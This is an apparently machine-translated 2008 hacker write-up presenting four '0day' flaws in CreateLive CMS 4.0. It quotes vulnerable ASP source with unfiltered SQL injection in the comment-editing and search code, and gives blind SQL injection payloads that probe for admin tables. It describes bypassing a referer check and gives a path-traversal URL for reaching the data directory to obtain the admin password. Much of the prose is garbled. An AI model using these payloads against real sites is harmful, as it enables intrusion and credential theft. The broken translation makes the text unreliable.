CreateLive CMS Version 4.0 0day.doc by:xiaok q:391232032.771044833 time: 2008-2-4 0 2:1 0 XP SP2 ie7 iis5. 1...... A tribute to D. S. T you gay, cause Hell-Phantom, the actuator on thin ice, causing the old D, The actuator Doom, causing the group to get help with the culture of the rogue......
Vulnerability is one of the
Source kingcms\User\User_Comment. asp CommentID
> sub SaveModify() > > ...... CommentID=Trim(Request("CommentID")) 'injection ...... if CommentID="" then FoundErr=True ErrMsg=ErrMsg &" > > * Add the specified comment ID > >" Exit sub end if ...... if FoundErr=True then exit sub sql="Select * from Cl_Comment where ChannelID="&ChannelID&" and UserID="&UserID&" & CommentID=" & CommentID 'injection Set rsComment=Server. CreateObject("Adodb. RecordSet") rsComment. Open sql,Conn,1,3 if rsComment. Bof or rsComment. EOF then FoundErr=True ErrMsg=ErrMsg &" > > * Cannot find the specified comment! > >" else ......
Without any filtering...... Of course new problems. Source kingcms\User\inc\Cl_ClsSysTem. asp
> 'Determine the submitted information is from an external Public Function ChkIsOuter() Dim server_v1,server_v2 ChkIsOuter=True server_v1=Cstr(Request. ServerVariables("HTTP_REFERER")) server_v2=Cstr(Request. ServerVariables("SERVER_NAME")) If Mid(server_v1,8,len(server_v2))=server_v2 Then ChkIsOuter=False End Function
All of the tools are not used, only to input some information and then post. NB to◎！＃￥￥ # OF % of % of However, in a few seconds I found another one, because the article would write does not go up......）
Vulnerability of the two
Most of the sites are to be members of the audit, not directly into the. Is a search for vulnerabilities to it.
Look at him how to write Source kingcms\User\User_Comment. asp
> SearchContent = Trim(request("SearchContent")) ...... Sub main() ...... if SearchContent<>"" then strSql2=strSql2 & " and M. CommentContent like '%" &SearchContent&"%'"
> %'and (select count() from admin)>0 and '%'=' %'and (select count() from cl_admin)>0 and '%'='
Then enter here
The first sentence is asked him there is no admin of this table it the answer
The second sentence is asked him there is no cl_admin this table,because cl_admin exist, so it the answer is
Believe some people understand.`can only rely on hand......
The vulnerability of the three
You want to send articles of permissions, and you want to an external submitted detection bypass......） Maybe you can't wait, bored, ready to end to At 2 0 0 8 years 2 months 4 days 0 4:4 1:0 7...... With the member login, and then access
> /Admin/Admin_Files. asp? action=Main&FileType=select&ChannelID=2&ThisDir=../../Data
You will find a/because I use the admin login, so....../ Get the password how easy
> if ThisDir<>"" then ThisDir=Replace(ThisDir & "/","//","/")
Hand cramps, do not write to
The vulnerability of four
Sources with a release note file, because the log and the admin is not a database, not use value...... Must not Gaiden if Gaiden since you do not made to
CMS Version 4.0 0day